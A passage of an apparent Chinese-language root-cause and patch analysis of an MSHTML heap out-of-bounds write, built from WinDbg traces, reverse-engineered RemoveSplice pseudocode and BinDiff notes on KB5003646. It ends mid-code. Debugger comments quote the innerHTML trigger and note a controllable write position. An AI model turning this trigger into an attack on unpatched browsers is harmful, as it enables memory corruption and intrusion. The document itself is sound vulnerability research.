     Flags = 0xb8 = 1011 1000,Pointer=0x8,TPF_LEFT_CHILD=0x10,TPF_LAST_CHILD=0x20,TPF_DATA_POS=0x80
_cchLeft = 00680002
_pFirstChild = 04896ae0,Text
_pNext = 04896c60,Pointer
_pLeft = 048a0624,</body>
_pRight = 04896c60,Pointer
_ulRefs_Flags = 00000040
pSmartObject = 00000000
_pTextData = 00000000
_dwPointerAndGravityAndCling = 04f3ce70

我根据CTreePos中的_pFirstChild和_pNext成员,可以还原出此漏洞PoC所对应的DOM树结构如下图所示:

我根据CTreePos中的_pLeft和_pRight成员,可以还原出此漏洞PoC所对应的DOM流结构如下图所示:

漏洞产生的根本原因分析

以下是动态调试过程中,关键部分的WinDbg输出内容:

(638.e60): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffd`64a43150 cc              int     3
0:020> bp MSHTML!CSpliceTreeEngine::RemoveSplice
0:020> bp 63A46783  ; Crash前调用的第一个CTreePos::GetCp()
0:020> bp 63A467B5  ; 分配存储要删除的元素的堆块,operator new[]()
0:020> bp 63A468CF  ; 获取文本的未截断长度,Tree::TextData::GetText()
0:020> g
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff            mov     edi,edi                                        ; 第一次中断,b.innerHTML = Array(40370176).toString();
0:008:x86> g
Breakpoint 0 hit
MSHTML!CSpliceTreeEngine::RemoveSplice:
63a46320 8bff            mov     edi,edi                                        ; 第二次中断,b.innerHTML = "";
0:008:x86> g
Breakpoint 1 hit
MSHTML!CSpliceTreeEngine::RemoveSplice+0x463:
63a46783 8b4e14          mov     ecx,dword ptr [esi+14h] ds:002b:0508ca1c=04aae54c
0:008:x86> p
eax=00000000 ebx=0508cb38 ecx=04aae54c edx=00000000 esi=0508ca08 edi=04aae54c
eip=63a46786 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x466:
63a46786 e8dc118900      call    MSHTML!CTreePos::GetCp (642d7967)              ; 返回值为0x2,<ROOT>和<html>标签对应的字符数
0:008:x86> dd ecx-0xc l10   ; CTreeNode,_ptpSourceL(<head>),0x04aae548 = 0x36 = 54,ETAG_HEAD = 54
04aae540  04a82d40 04aae240 70020036 00000061
04aae550  00000000 04a84b40 04aae24c 04a84b40
04aae560  04aae564 00000052 00000000 04aae5ac
04aae570  04aae5c4 04aae54c 04aae5ac ffffffff
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=00000000 edx=04a3d534 esi=0508ca08 edi=04aae54c
eip=63a4678b esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46b:
63a4678b 8b4e18          mov     ecx,dword ptr [esi+18h] ds:002b:0508ca20=04aae5c4
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=04aae54c
eip=63a4678e esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x46e:
63a4678e bf01000000      mov     edi,1
0:008:x86> dd ecx-0x24 l10  ; CTreeNode,_ptpSourceL(</body>),0x04aae5a8 = 0x12 = 18,ETAG_BODY = 18
04aae5a0  04a86320 04aae240 70020012 00000061
04aae5b0  00000000 00000000 04aae564 04aae564
04aae5c0  04a849f0 00000062 00000000 00000000
04aae5d0  04a849f0 04a849f0 04a84ae0 ffffffff
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=00000001
eip=63a46793 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x473:
63a46793 2bf8            sub     edi,eax                                        ; 1-2=-1
0:008:x86> p
eax=00000002 ebx=0508cb38 ecx=04aae5c4 edx=04a3d534 esi=0508ca08 edi=ffffffff
eip=63a46795 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000297
MSHTML!CSpliceTreeEngine::RemoveSplice+0x475:
63a46795 e8cd118900      call    MSHTML!CTreePos::GetCp (642d7967)              ; 返回值为0x00680004
; Array(40370176),40370176-1 = 0x267ffff
; CTreeDataPos->DATAPOSTEXT->_cch(25bit),0x67ffff
; 0x00680004 = 0x67ffff + 0x5
; <ROOT>,<html>,<head>,</head>,<body>标签的字符数每个为1
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=00000000 edx=04aae5c4 esi=0508ca08 edi=ffffffff
eip=63a4679a esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47a:
63a4679a 8b4e18          mov     ecx,dword ptr [esi+18h] ds:002b:0508ca20=04aae5c4
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=04aae5c4 edx=04aae5c4 esi=0508ca08 edi=ffffffff
eip=63a4679d esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x47d:
63a4679d 8d1407          lea     edx,[edi+eax]                                  ; edx = 0x00680003
; _ptpSourceL(<head>),_ptpSourceL(</body>)
; CTreeDataPos->DATAPOSTEXT->_cch(25bit),0x67ffff
; 0x00680003 = 0x67ffff + 0x4
; <head>,</head>,<body>,</body>标签的字符数每个为1
......
0:008:x86> g
Breakpoint 2 hit
MSHTML!CSpliceTreeEngine::RemoveSplice+0x495:
63a467b5 8b442458        mov     eax,dword ptr [esp+58h] ss:002b:0508c800=00680004
0:008:x86> p
MSHTML!CSpliceTreeEngine::RemoveSplice+0x499:
63a467b9 3b442460        cmp     eax,dword ptr [esp+60h] ss:002b:0508c808=00680004
0:008:x86> p
MSHTML!CSpliceTreeEngine::RemoveSplice+0x49d:
63a467bd 0f8f36ac1400    jg      MSHTML!CSpliceTreeEngine::RemoveSplice+0x14b0d9 (63b913f9) [br=0]
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=04aae5c4 edx=00680003 esi=0508ca08 edi=ffffffff
eip=63a467c3 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4a3:
63a467c3 8d0c12          lea     ecx,[edx+edx]
0:008:x86> p
eax=00680004 ebx=0508cb38 ecx=00d00006 edx=00680003 esi=0508ca08 edi=ffffffff
eip=63a467c6 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4a6:
63a467c6 e8c3fa1e00      call    MSHTML!ProcessHeapAlloc<0> (63c3628e)          ; 分配的堆块是以文本截断长度进行分配的
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=00d00006 edx=00000000 esi=0508ca08 edi=ffffffff
eip=63a467cb esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4ab:
63a467cb 89465c          mov     dword ptr [esi+5Ch],eax ds:002b:0508ca64=00000000
0:008:x86> !heap -x eax
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
0000000021d4e018  0000000021d4e020  0000000000670000  0000000000670000    d01000         0       ffa  busy extra virtual
0:008:x86> g
Breakpoint 3 hit
eax=000002e4 ebx=0508cb38 ecx=04a849f0 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468cf esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5af:
63a468cf 8b4920          mov     ecx,dword ptr [ecx+20h] ds:002b:04a84a10=1d02f020
0:008:x86> dd ecx lc    ; CTreeDataPos(Text)
04a849f0  000002e4 00000002 04aae564 04aae54c
04a84a00  04aae5ac 04aae5c4 00000041 00000000
04a84a10  1d02f020 8267ffff 00000000 00000000
0:008:x86> !heap -x 1d02f020
Entry     User      Heap      Segment       Size  PrevSize  Unused    Flags
-----------------------------------------------------------------------------
000000001d02f018  000000001d02f020  0000000000670000  0000000000670000   4d01000         0       ffa  busy extra virtual
0:008:x86> dd 1d02f020 l10  ; Tree::TextData对象
1d02f020  00000002 0267ffff 002c002c 002c002c
1d02f030  002c002c 002c002c 002c002c 002c002c
1d02f040  002c002c 002c002c 002c002c 002c002c
1d02f050  002c002c 002c002c 002c002c 002c002c
0:008:x86> dd 1d02f020+0x2680000*2-0x10 l10
21d2f010  002c002c 002c002c 002c002c 002c002c
21d2f020  002c002c 0000002c 00000000 00000000
21d2f030  00000000 00000000 00000000 00000000
21d2f040  00000000 00000000 00000000 00000000
0:008:x86> p
eax=000002e4 ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d2 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b2:
63a468d2 8d442414        lea     eax,[esp+14h]
0:008:x86> p
eax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d6 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b6:
63a468d6 50              push    eax                                            ; 存储实际获得的文本长度的局部变量
0:008:x86> p
eax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d7 esp=0508c7a4 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b7:
63a468d7 6a00            push    0                                              ; skip_cch,需要跳过的字符数
0:008:x86> p
eax=0508c7bc ebx=0508cb38 ecx=1d02f020 edx=00000003 esi=0508ca08 edi=0000fdef
eip=63a468d9 esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5b9:
63a468d9 e890b1fbff      call    MSHTML!Tree::TextData::GetText (63a01a6e)     
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=1d02f020 edx=0508c7bc esi=0508ca08 edi=0000fdef
eip=63a468de esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5be:
63a468de 8b7c2414        mov     edi,dword ptr [esp+14h] ss:002b:0508c7bc=0267ffff
0:008:x86> dd eax-0x8 l10       ; 返回值为文本字符串的指针,Tree::TextData对象偏移8字节处
1d02f020  00000002 0267ffff 002c002c 002c002c
1d02f030  002c002c 002c002c 002c002c 002c002c
1d02f040  002c002c 002c002c 002c002c 002c002c
1d02f050  002c002c 002c002c 002c002c 002c002c
0:008:x86> dd 0508c7bc l1
0508c7bc  0267ffff              ; 实际获得的文本长度,未截断文本长度,0x0267ffff = 40370176 - 1
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=1d02f020 edx=0508c7bc esi=0508ca08 edi=0267ffff
eip=63a468e2 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5c2:
63a468e2 8b4c2424        mov     ecx,dword ptr [esp+24h] ss:002b:0508c7cc=00000003
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=0508c7bc esi=0508ca08 edi=0267ffff
eip=63a468e6 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5c6:
63a468e6 8b54241c        mov     edx,dword ptr [esp+1Ch] ss:002b:0508c7c4=00680003
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468ea esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5ca:
63a468ea 57              push    edi                                            ; edi,源文本字符串长度,未截断文本长度
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468eb esp=0508c7a4 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cb:
63a468eb 50              push    eax                                            ; eax,源文本字符串内存地址
0:008:x86> p
eax=1d02f028 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468ec esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cc:
63a468ec 8b465c          mov     eax,dword ptr [esi+5Ch] ds:002b:0508ca64=21d4e020
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=00000003 edx=00680003 esi=0508ca08 edi=0267ffff
eip=63a468ef esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5cf:
63a468ef 2bd1            sub     edx,ecx                                        ; edx,目的内存大小,截断文本长度
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=00000003 edx=00680000 esi=0508ca08 edi=0267ffff
eip=63a468f1 esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d1:
63a468f1 8d0c48          lea     ecx,[eax+ecx*2]                                ; ecx,目的内存地址
0:008:x86> p
eax=21d4e020 ebx=0508cb38 ecx=21d4e026 edx=00680000 esi=0508ca08 edi=0267ffff
eip=63a468f4 esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d4:
63a468f4 e8b8852500      call    MSHTML!wmemcpy_s (63c9eeb1)
0:008:x86> dd esp l2
0508c7a0  1d02f028 0267ffff
0:008:x86> p
Invalid parameter passed to C runtime function.
eax=00000022 ebx=0508cb38 ecx=8cccdfa3 edx=00000000 esi=0508ca08 edi=0267ffff
eip=63a468f9 esp=0508c7a0 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x5d9:
63a468f9 8b4c2418        mov     ecx,dword ptr [esp+18h] ss:002b:0508c7b8=04a849f0
0:008:x86> g
(638.ad8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=21d4e020 ebx=0508cb38 ecx=04aae5c4 edx=02680002 esi=0508ca08 edi=0000fdef
eip=63a46809 esp=0508c7a8 ebp=0508c9f0 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
MSHTML!CSpliceTreeEngine::RemoveSplice+0x4e9:
63a46809 66893c50        mov     word ptr [eax+edx*2],di  ds:002b:26a4e024=????     ; Crash

下面是存在漏洞的函数CSpliceTreeEngine::RemoveSplice()的关键部分代码(逆向所得):

HRESULT __thiscall CSpliceTreeEngine::RemoveSplice(CSpliceTreeEngine *this)
{
    // 初始DOM流,_ptpSourceL(<head>),_ptpSourceR(CTreeDataPos(Pointer,04b152f0))
    // <ROOT> -> <html> -> CTreeDataPos(Pointer,04b15320) -> <head> -> </head> -> <body> -> CTreeDataPos(Text,04b151a0) 
    // -> </body> -> CTreeDataPos(Pointer,04b152f0) -> </html> -> </ROOT>
    ...
    // pSpliceAnchor._pTreePos = _ptpSourceL->_pLeft
    // 执行完第一个CSpliceTreeEngine::CSpliceAnchor::AnchorAt()后的DOM流
    // <ROOT> -> <html> -> CTreeDataPos(Pointer,04b15320) ->CTreeDataPos(Pointer,04b15350) -> <head> -> </head> -> <body> 
    // -> CTreeDataPos(Text,04b151a0) -> </body> -> CTreeDataPos(Pointer,04b152f0) -> </html> -> </ROOT>
    hr1 = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchorL, ptpSourceL, 1, 0);
    // pSpliceAnchor1._pTreePos = _ptpSourceR->_pRight
    // 执行完第二个CSpliceTreeEngine::CSpliceAnchor::AnchorAt()后的DOM流
    // <ROOT> -> <html> -> CTreeDataPos(Pointer,04b15320) ->CTreeDataPos(Pointer,04b15350) -> <head> -> </head> -> <body> 
    // -> CTreeDataPos(Text,04b151a0) -> </body> -> CTreeDataPos(Pointer,04b152f0) -> CTreeDataPos(Pointer,04b15380) -> </html> -> </ROOT>
    if ( hr1 || (hr1 = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchorR, this->_ptpSourceR, 0, 1)) != 0 )// ?不满足
    {
LABEL_156:
        hr = hr1;
        goto LABEL_157;
    }
    // _ptpSourceL != _ptpSourceR->NextTreePos()
    if ( this->_ptpSourceR->_pRight != this->_ptpSourceL )// ?必须满足,CSpliceTreeEngine,CTreePos
    {
        ...
        if ( HIBYTE(v179) && (this->field_54 & 4) != 0 )// CSpliceTreeEngine,CMarkUp,this->field_54=0x4
        {
            ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL);// 1-2=-1,_ptpSourceL(<head>)
            ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR);// 0x00680005,_ptpSourceR(CTreeDataPos(Pointer,04b152f0))
            ptpSourceR = this->_ptpSourceR;
            fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0;
            ptpSourceR_to_ptpSourceL_cch = ptpSourceL_cchLeft + ptpSourceR_cchLeft;
            if ( !fNotText )                          // fNotText = True
            {
                TextLength = CTreeDataPos::GetTextLength(ptpSourceR);
                ptpSourceR_to_ptpSourceL_cch = TextLength + ptpSourceR_to_ptpSourceL_cch - 1;
            }
            LOBYTE(ptpSourceR) = HIBYTE(v179);        // ptpSourceR = v179 = 1
            v11 = cch;                                // v173 = 0
        }
        ...
        if ( ptpSourceR )                           // ?必须满足
        {
            if ( (this->field_54 & 4) != 0 )
            {
                ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL);// 1-2=-1,_ptpSourceL(<head>)
                ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR);// 0x00680005,_ptpSourceR(CTreeDataPos(Pointer,04b152f0))
                ptpSourceR = this->_ptpSourceR;
                fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0;
                ptpSourceR_to_ptpSourceL_cch1 = ptpSourceL_cchLeft + ptpSourceR_cchLeft;//CTreePos,Cp
                if ( !fNotText )
                {
                    TextLength = CTreeDataPos::GetTextLength(ptpSourceR);
                    ptpSourceR_to_ptpSourceL_cch1 = TextLength + ptpSourceR_to_ptpSourceL_cch1 - 1;
                }
            }
        }
        ...
    }
    ...
    // 去除边界上带有cling的指针。这样做是为了让_ptpSourceL/R可以在非指针位置上重新定位。我们这样做是为了让元素能够在退出树通知中进行选择。
    while ( 1 )
    {
        ptpSourceL = this->_ptpSourceL;             // _ptpSourceL(<head>)
        // Pointer=0x8,_ptpSourceL->IsPointer()
        if ( (ptpSourceL->_cElemLeftAndFlags & 8) == 0 || ptpSourceL == this->_ptpSourceR )// ?必须满足,CTreePos
            break;  // _ptpSourceL(<head>),退出循环
        // _ptpSourceL->NextTreePos()
        ptpSourceL_Right = ptpSourceL->_pRight;
        if ( (ptpSourceL->dptp.p._dwPointerAndGravityAndCling & 2) != 0 )// Cling = 0x2
            Tree::TreeWriter::Remove(ptpSourceL, &this->_pMarkupSource->_tpRoot, &this->_pMarkupSource->_ptpFirst);
        this->_ptpSourceL = ptpSourceL_Right;
    }
    while ( 1 )
    {
        ptpSourceR = this->_ptpSourceR;             // _ptpSourceR(CTreeDataPos(Pointer,04b152f0))
        if ( (ptpSourceR->_cElemLeftAndFlags & 8) == 0 || this->_ptpSourceL == ptpSourceR )// ?必须满足,CTreePos
            break;
        // _ptpSourceR->PreviousTreePos()
        ptpSourceR_Left = ptpSourceR->_pLeft;
        if ( (ptpSourceR->dptp.p._dwPointerAndGravityAndCling & 2) != 0 )// Cling = 0x2
            Tree::TreeWriter::Remove(ptpSourceR, &this->_pMarkupSource->_tpRoot, &this->_pMarkupSource->_ptpFirst);
        this->_ptpSourceR = ptpSourceR_Left;    // 这里对_ptpSourceR进行了修改,最终_ptpSourceR(</body>)
    }
    ...
    if ( (ptpSourceR->_cElemLeftAndFlags & 4) == 0// ptpSourceR(</body>)
        || ptpSourceR == this->_ptpSourceL
        || (hr = CSpliceTreeEngine::CSpliceAnchor::AnchorAt(&pSpliceAnchor, ptpSourceR, 1, 1), (hr1 = hr) == 0) )// ?必须满足,CTreePos
    {
        ...
        while ( 1 )
        {
            Cch = 0;
            if ( HIBYTE(v179) && (this->field_54 & 4) != 0 )// ?必须满足
            {
                ptpSourceL_cchLeft = 1 - CTreePos::GetCp(this->_ptpSourceL);// 1-2=-1,_ptpSourceL(<head>)
                // ptpSourceR,截断文本长度,orig_sz&0x1ffffff,CTreeDataPos中DATAPOSTEXT结构体存储文本长度的_cch成员只有25bit
                ptpSourceR_cchLeft = CTreePos::GetCp(this->_ptpSourceR);// 0x00680004,_ptpSourceR(</body>)
                ptpSourceR = this->_ptpSourceR;
                ptpSourceR_to_ptpSourceL_cch2 = ptpSourceL_cchLeft + ptpSourceR_cchLeft;
                fNotText = (ptpSourceR->_cElemLeftAndFlags & 4) == 0;// Text=0x4
                ptpSourceR_to_ptpSourceL_cch2 = ptpSourceL_cchLeft + ptpSourceR_cchLeft;
                if ( !fNotText )                        // 是文本数据则执行,不必须满足,CTreePos
                {
                    TextLength = CTreeDataPos::GetTextLength(ptpSourceR);
                    ptpSourceR_to_ptpSourceL_cch2 = TextLength + ptpSourceR_to_ptpSourceL_cch2 - 1;
                }
                // ptpSourceR_to_ptpSourceL_cch = 0x00680004 = 1-2+0x00680005
                // ptpSourceR_to_ptpSourceL_cch1 = 0x00680004 = 1-2+0x00680005
                if ( ptpSourceR_to_ptpSourceL_cch > ptpSourceR_to_ptpSourceL_cch1 )// ?不满足,v192(CTreePos),v194(CTreePos)
                {
                    ...
                }
                else
                {
                    pUndoChRecord = operator new[](2 * ptpSourceR_to_ptpSourceL_cch2);// g_hProcessHeap
                    this->_pUndoChRecord = pUndoChRecord;
                    if ( pUndoChRecord )                  // ?必须满足,CSpliceTreeEngine
                    {
                        ptpSourceR = this->_ptpSourceR; // _ptpSourceR(</body>)
                        ptpSourceL = this->_ptpSourceL; // _ptpSourceL(<head>)
                        for ( ptp = ptpSourceL; ptp != ptpSourceR->_pRight; ptp = ptp->_pRight )// ?必须满足,CTreePos
                        {
                            // <head> -> </head> -> <body> -> CTreeDataPos(Text,04b151a0) -> </body>
                            ptp_cElemLeftAndFlags = ptp->_cElemLeftAndFlags;
                            if ( (ptp_cElemLeftAndFlags & 4) != 0 )// ?必须满足,CTreePos,Text=0x4
                            {
                                // 未截断文本长度,CTreeDataPos中_pTextData成员指向的Tree::TextData类对象的_cch,使用32bit存储文本长度
                                pText = Tree::TextData::GetText(ptp->_pTextData, 0, &TextLen);
                                // 这里只是向堆块复制了ptpSourceR_to_ptpSourceL_cch2多个字符(宽字符)
                                wmemcpy_s(&this->_pUndoChRecord[Cch], ptpSourceR_to_ptpSourceL_cch2 - Cch, pText, TextLen);
                                Cch += TextLen; //下面会使用未截断的文本长度进行索引
                            }
                            // BOOL IsNode() const { return TestFlag(NodeBeg|NodeEnd); },NodeBeg=0x1,NodeEnd=0x2
                            // BOOL IsEdgeScope() const { return TestFlag(TPF_EDGE); },TPF_EDGE=0x40
                            // BOOL IsData2Pos() const { return TestFlag(TPF_DATA2_POS); },TPF_DATA2_POS=0x40
                            else if ( (ptp_cElemLeftAndFlags & 3) != 0 && (ptp_cElemLeftAndFlags & 0x40) != 0 )// ?必须满足,CTreePos
                            {
                                this->_pUndoChRecord[Cch++] = 0xFDEF;   // Crash,写入内容无法控制,写入位置可以控制
                            }
                        }
                    }
                    else
                    {
                        ...
                    }
                }
            }
            ...
        }
        ...
    }
    ...
}

造成堆越界写的根本原因是,用于标识文本字符串在DOM树/DOM流中的位置的CTreeDataPos类对象中有两个结构用于记录文本字符串的长度,一个是结构体DATAPOSTEXT的_cch成员(25bit),一个是Tree::TextData对象中的_cch成员(32bit)。由于它们的大小不同,当文本字符串的长度超过25bit能够表示的长度后,在向结构体DATAPOSTEXT的_cch成员赋值时,会造成其存储的是截断后的长度。之后调用CSpliceTreeEngine::RemoveSplice()函数删除文本字符串在DOM树/DOM流的结构时,会使用CTreePos::GetCp()函数获得要删除的DOM树/DOM流结构所占用的字符数(包含截断的文本字符串长度),并用其申请一段内存。然后,调用Tree::TextData::GetText()函数获得Tree::TextData对象中的_cch成员中存储的未截断文本字符串长度,并用其作为索引,对前面申请的内存进行赋值操作,从而造成了堆越界写漏洞。

 

漏洞修复

分析此漏洞时,使用的环境是Windows 10 1809 Pro x64。在此漏洞的MSRC公告页面,可以找到当前环境该漏洞的补丁号为KB5003646。在补丁详情页面,我们可以知道此补丁只适用于LTSC版本。当前环境,此补丁无法安装成功。所以我使用Windows 10 Enterprise LTSC 2019环境来进行补丁安装并进行补丁分析。我用的是2019年03月发布的Windows 10 Enterprise LTSC 2019,成功安装此漏洞补丁需要先安装2021年5月11日之后发布的服务堆栈更新(SSU),这里安装的是KB5003711,安装完之后再安装此漏洞的补丁KB5003646,就可以成功安装。

由于KB5003646补丁是2021年6月8日发布的一个累计更新,如果补丁分析时所用的两个漏洞模块文件是两个更新时间相差较大的环境提取出来的,会造成不好定位补丁位置。所以我们需要知道2021年5月发布的累计更新补丁编号。这可以通过KB5003646在Microsoft更新目录详情页面的信息得到。

以下是KB5003171和KB5003646补丁对应的mshtml.dll的版本号:

补丁编号 mshtml.dll版本号
KB5003171 11.0.17763.1911
KB5003646 11.0.17763.1999

接下来我们将这两个补丁环境的mshtml.dll提取出来,使用IDA打开并生成IDB文件,再使用BinDiff进行补丁比较。不同的IDA版本和不同的BinDiff版本可能会出现不兼容的情况,我这里使用的是IDA Pro7.5+BinDiff6。分析完成后,得到如下结果:

根据前面的根本原因分析,我们可以知道此漏洞是和文本字符串相关的。再来看BinDiff分析出来的结果,存在差异的函数中只有Tree::TreeWriter::NewTextPosInternal()和CTreeDataPos::GetPlainTextLength()是与文本字符串有关的。通过IDA静态分析这两个函数后,可以确定补丁位置位于Tree::TreeWriter::NewTextPosInternal()函数中。因为CTreeDataPos::GetPlainTextLength()函数中调用了Tree::TextData::GetText()函数,从之前给出的逆向出的Tree::TextData::GetText()函数代码可知,Tree::TextData::GetText()函数是从Tree::TextData对象获取文本字符串的指针和长度的。Tree::TextData对象中的_cch用于存储文本字符串的长度,它的长度为32bit。而CTreeDataPos对象中结构体DATAPOSTEXT的_cch成员也是用于存储文本字符串的长度,它的长度为25bit。如果字符串长度超过了25bit所能表示的范围,在向结构体DATAPOSTEXT的_cch成员存入字符串长度时,就会造成截断。补丁代码应该是在向结构体DATAPOSTEXT的_cch成员写入文本字符串长度时,对文本字符串的长度进行判断。所以补丁位置并不在CTreeDataPos::GetPlainTextLength()函数中。

下图为Tree::TreeWriter::NewTextPosInternal()函数中添加的补丁代码:

如下是,经过处理的补丁前后Tree::TreeWriter::NewTextPosInternal()函数的IDA反编译代码:

//补丁前:
void __fastcall Tree::TreeWriter::NewTextPosInternal(CTreeDataPos **ppTreeDataPos, const wchar_t *SrcTextPtr, ULONG SrcTextCch, const CTreePos *a4, enum htmlLayoutMode eHLM, BYTE sid, LONG lTextID, int a8, bool a9)
{
  CTreeDataPos *pTreeDataPos; // ecx

